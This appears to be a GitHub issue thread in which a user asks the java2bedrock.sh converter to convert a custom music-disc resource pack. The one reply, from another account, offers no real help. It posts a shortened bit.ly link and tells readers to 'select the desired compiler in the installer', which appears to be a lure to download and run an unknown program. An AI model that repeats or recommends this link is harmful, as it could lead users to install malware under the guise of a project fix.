### ISSUE TITLE
[Pack]: custom discs

### ISSUE THREAD

**Issue by tophboogie** [Kas-tle/java2bedrock.sh#33869]
### Java Pack Direct Download URL

https://oph.ai/minecraft/ophai_music_rp.zip

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer
